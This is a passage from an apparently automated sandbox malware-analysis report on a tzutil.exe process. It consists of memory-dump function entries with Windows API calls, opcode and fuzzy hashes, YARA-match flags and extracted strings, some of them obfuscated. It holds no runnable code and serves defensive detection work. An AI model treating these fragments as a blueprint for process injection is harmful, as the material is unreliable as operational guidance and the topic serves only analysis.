                                                                    • Snapshot File: hcaresult_8_2_28b0000_tzutil.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InitializeUninitialize
                                                                    • String ID: @J7<
                                                                    • API String ID: 3442037557-2016760708
                                                                    • Opcode ID: 1f689e5722081d79dd2b489bdd5053e9c44b1b93b73407c68c5540e258936cf8
                                                                    • Instruction ID: fd46629ac6f8d0294011e3c6669c046a4c7a77f2fc423815d5b59cbef493ae9d
                                                                    • Opcode Fuzzy Hash: 1f689e5722081d79dd2b489bdd5053e9c44b1b93b73407c68c5540e258936cf8
                                                                    • Instruction Fuzzy Hash: 4B3132BAA00209AFDB14DFD8C8809EFB7BAFF88304F108559E505E7214D775EE058BA1
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_28b0000_tzutil.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 59613f67ab0b44fc569472441be565e37fa422d4333c6dd1dd2efb647779117c
                                                                    • Instruction ID: f00692a047e7fb6855c2e75dd7af9d7c81b188d4484de2274c55f122cda23d20
                                                                    • Opcode Fuzzy Hash: 59613f67ab0b44fc569472441be565e37fa422d4333c6dd1dd2efb647779117c
                                                                    • Instruction Fuzzy Hash: 3221B37F7001055FC315CA68D891BF9B728EB41225F20029CF914CF281D7319966C7D5
                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 028C4A02
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_28b0000_tzutil.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: aa15e0bea88f3d3eb8164487ffdb839de0913709777854031ac92b482dca4ce8
                                                                    • Instruction ID: 7ee455e06488fea73739b63e4d32fed321912809fc10b6a98f4aa3b3c19fa197
                                                                    • Opcode Fuzzy Hash: aa15e0bea88f3d3eb8164487ffdb839de0913709777854031ac92b482dca4ce8
                                                                    • Instruction Fuzzy Hash: 5B21DF3F6001868FCB11CE68D850BE9FF64EB86529F3042DCD468CB252D332D4AAC794
                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 028C4A02
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_28b0000_tzutil.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: b799f33cdfcceec68cf2461573a55d2e37cccfb65537d172954ac166eadf2d1b
                                                                    • Instruction ID: b3476d06ebc7acc7bad490ac921057b4f6c407bcd6278ac866321a43a39809e2
                                                                    • Opcode Fuzzy Hash: b799f33cdfcceec68cf2461573a55d2e37cccfb65537d172954ac166eadf2d1b
                                                                    • Instruction Fuzzy Hash: DB011EBDD4020DBBDB14DAA4DC41F9DB7B9AB44308F104195E908D7251F671E758CB92
                                                                    APIs
                                                                    • CreateProcessInternalW.KERNELBASE(?,?,?,?,028C8724,00000010,?,?,?,00000044,?,00000010,028C8724,?,?,?), ref: 028D9BB3
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_28b0000_tzutil.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateInternalProcess
                                                                    • String ID:
                                                                    • API String ID: 2186235152-0
                                                                    • Opcode ID: ba0705d331adb0827d90e0a0c05e4e99946108ce1be150fedcd619b1613f899a
                                                                    • Instruction ID: f113d7baded6e849ebdfd922c6ee60d3446c0b4f8e0ad78579c88500f9695b2f
                                                                    • Opcode Fuzzy Hash: ba0705d331adb0827d90e0a0c05e4e99946108ce1be150fedcd619b1613f899a
                                                                    • Instruction Fuzzy Hash: B501C0B6215108BBCB04DE99DC90EEB77AEEF8C754F108208FA0DE3240D630F8518BA5
                                                                    APIs
                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 028B9F62
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_28b0000_tzutil.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread
                                                                    • String ID:
                                                                    • API String ID: 2422867632-0
                                                                    • Opcode ID: c463900b9fbcea7865d729dbd8ce692ca1e0d4df9bad2f7c5cf101c691f30119
                                                                    • Instruction ID: c989d74c0ba2c4cb3408d5932d800ced1da83291b65f866e93ff050d5a4e8308
                                                                    • Opcode Fuzzy Hash: c463900b9fbcea7865d729dbd8ce692ca1e0d4df9bad2f7c5cf101c691f30119
                                                                    • Instruction Fuzzy Hash: F3F0393B38030436E22161A99C02FDBA79D8F85B65F14002AFA0CEA680D996B8058AA5
                                                                    APIs
                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 028B9F62
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_28b0000_tzutil.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread
                                                                    • String ID:
                                                                    • API String ID: 2422867632-0
                                                                    • Opcode ID: 5b05dc4f9ac00e1fb97425b4699cabbd5fdff5ea68f0ab42ae6c2005985b54c1
                                                                    • Instruction ID: 54c54b6335f11c44e4f0de3a57ed3c034c1d503363f0af0606b3aca43fd89ad5
                                                                    • Opcode Fuzzy Hash: 5b05dc4f9ac00e1fb97425b4699cabbd5fdff5ea68f0ab42ae6c2005985b54c1
                                                                    • Instruction Fuzzy Hash: DFF0653B6407103AE73166AC8C02FDBAB998F95B64F240119F619EF6C0D595B4058FB5
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(028C1E59,?,028D5F17,028C1E59,?,028D5F17,?,028C1E59,028D59BF,00001000,?,00000000), ref: 028D9AC9
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_28b0000_tzutil.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: ac00b1638777126d2cea74cea7df9c0d5320b23dccd002bc6f264aef07eeb62c
                                                                    • Instruction ID: 955002d9bc263471eb8bf2a42814ffb5d4ce3c2d6378ee7d54a80d694efdc5f1
                                                                    • Opcode Fuzzy Hash: ac00b1638777126d2cea74cea7df9c0d5320b23dccd002bc6f264aef07eeb62c
                                                                    • Instruction Fuzzy Hash: F8E09A7A2002087BC614EF69DC40F9B77ADEFC9710F004408FA08E7240C631B9108BB9
                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,3777EA40,00000007,00000000,00000004,00000000,028C4211,000000F4), ref: 028D9B09
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_28b0000_tzutil.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    • Opcode ID: b80920223b0d3d6ec0276f1483e88535983c36a14dc249cb946427c0f6602cca
                                                                    • Instruction ID: 006d835cc96389e4d1fa108e6c9df8aec7338c9de84d0c5bf6bcc4850d0c9a7b
                                                                    • Opcode Fuzzy Hash: b80920223b0d3d6ec0276f1483e88535983c36a14dc249cb946427c0f6602cca
                                                                    • Instruction Fuzzy Hash: 48E09A7A200304BBC624EF58DC41FAB77AEEFC9B10F004418F908AB341C630B8248BB5
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 028C878A
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_28b0000_tzutil.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: b2fdd7f5a1d97f55da9e9883e388d1a9d0ed00b807dd1d66f4156bc78fba80a9
                                                                    • Instruction ID: 16449ee438f3e284c97290bdeff07606363647d7ef30b3b5bcab88a04bf5edbb
                                                                    • Opcode Fuzzy Hash: b2fdd7f5a1d97f55da9e9883e388d1a9d0ed00b807dd1d66f4156bc78fba80a9
                                                                    • Instruction Fuzzy Hash: 2DE0867D2802042BFF1466A89C45F6633584B88638F694A64BA1CDB2C2E774F5018654
                                                                    APIs
                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,028C2150,028D82FF,?,028C211B), ref: 028C8591
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_28b0000_tzutil.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorMode
                                                                    • String ID:
                                                                    • API String ID: 2340568224-0
                                                                    • Opcode ID: 8078e4b5b8cf14619579fb5ecae74e25a8c9f02cfd6a8169a37789255bfbf125
                                                                    • Instruction ID: 1f5c44db47f0b55c6a0b41ad016654d9ec142d4a8141015c12d38caf051b04a3
                                                                    • Opcode Fuzzy Hash: 8078e4b5b8cf14619579fb5ecae74e25a8c9f02cfd6a8169a37789255bfbf125
                                                                    • Instruction Fuzzy Hash: 24D05E7A3803043BFA00A6E89C47F56328E8F08765F494068BA0CEB2C1EA65F5008976
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: a0fb89806f683d1eb8a96087555528e3ba9d98c45cb40c9b58e538ab1d25e306
                                                                    • Instruction ID: ef8d444652e5178c3827649d44e8ecf3a355aa62d2a0d6aff787b2da276006d0
                                                                    • Opcode Fuzzy Hash: a0fb89806f683d1eb8a96087555528e3ba9d98c45cb40c9b58e538ab1d25e306
                                                                    • Instruction Fuzzy Hash: 74B09B719019C5C7DA15E7604708717790467D5701F29C561D2130641E4739C5D1E175
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3257753019.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_2fd0000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 54c83316a2d1e38cf01f858fa1577372f4876acfbed09934fba294c8bba2248b
                                                                    • Instruction ID: 17c39233d1f503ee3e5b5839fd3870be9c608ecfb55c235f468c4ba5016387b3
                                                                    • Opcode Fuzzy Hash: 54c83316a2d1e38cf01f858fa1577372f4876acfbed09934fba294c8bba2248b
                                                                    • Instruction Fuzzy Hash: 0441E371A18B0D4FD728AF6894817B6B3E3FB48340F54062DDA8AC3352EB74E8468685
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3257753019.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_2fd0000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                    • API String ID: 0-3558027158
                                                                    • Opcode ID: 47cf9afc285d78d3c590a56293d944d5d20f980efb9425facb2a64674c5c23be
                                                                    • Instruction ID: 81ee9f9d475c417c0d8da2c6de45ddfb22eeda6fb253d98e5f1ae168aa3d08d1
                                                                    • Opcode Fuzzy Hash: 47cf9afc285d78d3c590a56293d944d5d20f980efb9425facb2a64674c5c23be
                                                                    • Instruction Fuzzy Hash: C3A150F04482948AC7158F58A0552AFFFB1EBC6305F15816DE7E6BB243C3BE8909CB95
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                    • API String ID: 48624451-2108815105
                                                                    • Opcode ID: 315ea817e17bd11d21384d9b16ca13cf80174533f9dc670a66cd22f20f279e05
                                                                    • Instruction ID: e6347a103b5e0fe8299d1988bd504311fe3f2475f92ad6ea62972d8e8a9192f4
                                                                    • Opcode Fuzzy Hash: 315ea817e17bd11d21384d9b16ca13cf80174533f9dc670a66cd22f20f279e05
                                                                    • Instruction Fuzzy Hash: 465127B6A00216BFCB24DB98C88097EFBF8BB0D2017548569E475D7641D374DE558BA0
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                    • API String ID: 48624451-2108815105
                                                                    • Opcode ID: ce6bcc86342e1b16b4fbb398ae4be96ab16203c825a64b4bb29de58b0a8ae4e0
                                                                    • Instruction ID: f0d42c091ddcb8d257e2f34d246451f664633130b9361129264f55f671532a85
                                                                    • Opcode Fuzzy Hash: ce6bcc86342e1b16b4fbb398ae4be96ab16203c825a64b4bb29de58b0a8ae4e0
                                                                    • Instruction Fuzzy Hash: 9B51B569A10746AFCB28DB9EC89097FB7F9DF48201B088C59F4A5D7641D7B4DA808B60
                                                                    Strings
                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03204725
                                                                    • ExecuteOptions, xrefs: 032046A0
                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03204742
                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03204655
                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 03204787
                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 032046FC
                                                                    • Execute=1, xrefs: 03204713
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                    • API String ID: 0-484625025
                                                                    • Opcode ID: cccb7fd17ecfda079c280430d6669cbf600fb3070ab475ec4faf429649afa50b
                                                                    • Instruction ID: 83eb321082e8ebebe68c02783d21867b3b82d9f24cf98cb0964e902bdd991f5f
                                                                    • Opcode Fuzzy Hash: cccb7fd17ecfda079c280430d6669cbf600fb3070ab475ec4faf429649afa50b
                                                                    • Instruction Fuzzy Hash: FB51F935A103697FEF10EBA5DD89BADB3B8AF1C700F0401ADD515AB1D1DBB09A858F50
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                    • Instruction ID: 2ad8851c752e1489e64a5f55d8981c85f147cce9a87ac5dfc10174780197d061
                                                                    • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                    • Instruction Fuzzy Hash: 96022475518341AFC304CF18C890A6FBBE5EFC8704F048A6DF9899B264DB75E985CB82
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID: __aulldvrm
                                                                    • String ID: +$-$0$0
                                                                    • API String ID: 1302938615-699404926
                                                                    • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                    • Instruction ID: 3a27628a9c27f8aa5024b2afe5a9f2d37e0b993f0b4ad60b0ee791790d35a62c
                                                                    • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                    • Instruction Fuzzy Hash: D3818074E092499BDF28CE68C8917FEBBA5AF4E350F1EC259D852A73D0C7349880CB50
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: %%%u$[$]:%u
                                                                    • API String ID: 48624451-2819853543
                                                                    • Opcode ID: ace7e335bfdb2e06d03595ea7a39b79e4a35bdd6d564d9fe35f8a1257865b45a
                                                                    • Instruction ID: ca465fb6545419635d2b3365ad702c0af353f56b58880f6cc878eeebfdce1e49
                                                                    • Opcode Fuzzy Hash: ace7e335bfdb2e06d03595ea7a39b79e4a35bdd6d564d9fe35f8a1257865b45a
                                                                    • Instruction Fuzzy Hash: DB21567AA102199BDB14DF6AD8409AFB7E8AF48A40F080515F915E7201E771DA41CBA1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3257753019.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_2fd0000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: XQcQ$X]_Q$gURU$uZPF$vA]X$w\F[$y[N]
                                                                    • API String ID: 0-1416458366
                                                                    • Opcode ID: dedf437aa38687259b1bad9c904173211a3205b851b084e00ad0a60b07b74ce9
                                                                    • Instruction ID: 1a5c0053c3c3caf5c1e95774501ddf1ebc08f470e9e5a605cbe05754fa8210a2
                                                                    • Opcode Fuzzy Hash: dedf437aa38687259b1bad9c904173211a3205b851b084e00ad0a60b07b74ce9
                                                                    • Instruction Fuzzy Hash: 7E31E2B091038CEBCF05CF94D5846DEBBB1FF04389F858559E81A6F250C771865ACB8A
                                                                    Strings
                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 032002E7
                                                                    • RTL: Re-Waiting, xrefs: 0320031E
                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 032002BD
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                    • API String ID: 0-2474120054
                                                                    • Opcode ID: e5143cf9f5b975143a1fbca3a86df97011a1022bf6c84c27c24582b6aa8fa074
                                                                    • Instruction ID: db5d3de785891b7a58589f55bae0835e317533927b414473f04e6302102b05c5
                                                                    • Opcode Fuzzy Hash: e5143cf9f5b975143a1fbca3a86df97011a1022bf6c84c27c24582b6aa8fa074
                                                                    • Instruction Fuzzy Hash: 10E1DF346147429FD725CF28C884B6AB7F0BF89714F184A6DF4A58B2D1D774D88ACB42
                                                                    Strings
                                                                    • RTL: Re-Waiting, xrefs: 03207BAC
                                                                    • RTL: Resource at %p, xrefs: 03207B8E
                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03207B7F
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                    • API String ID: 0-871070163
                                                                    • Opcode ID: 07188668027a9f496f792844e975af972679fea89aa0995a10af4bdadf8b9282
                                                                    • Instruction ID: 0c5ab904db874ff1c01ecd3073b8716044183eb206d57b9932ad3f638a132033
                                                                    • Opcode Fuzzy Hash: 07188668027a9f496f792844e975af972679fea89aa0995a10af4bdadf8b9282
                                                                    • Instruction Fuzzy Hash: 554122353187429FC724CE29C841B6AB7E5EF9C710F044A2DF85ADB780DB70E8458B91
                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0320728C
                                                                    Strings
                                                                    • RTL: Re-Waiting, xrefs: 032072C1
                                                                    • RTL: Resource at %p, xrefs: 032072A3
                                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03207294
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                    • API String ID: 885266447-605551621
                                                                    • Opcode ID: fd65fba54d48f005470d6dcb863381b474546dbaa489d9b6df92482397e65acd
                                                                    • Instruction ID: d700e233a5673ff8b3534971219a31f53fe0588949b0e4c79011c3122f2f62c1
                                                                    • Opcode Fuzzy Hash: fd65fba54d48f005470d6dcb863381b474546dbaa489d9b6df92482397e65acd
                                                                    • Instruction Fuzzy Hash: 10411035618246AFC720CE28CC42B6AB7A5FF58710F144619F855EB281DB31F896CBD0
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                    • Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: %%%u$]:%u
                                                                    • API String ID: 48624451-3050659472
                                                                    • Opcode ID: 72628cde6d088d830969532e77bbdd285542c6f7d0442b9025a7c5f79ab5e252
                                                                    • Instruction ID: e8197c330c19bc426e2d8ae47831e2216beefb3f9f0198b7ef6e77421b0c8c57
                                                                    • Opcode Fuzzy Hash: 72628cde6d088d830969532e77bbdd285542c6f7d0442b9025a7c5f79ab5e252
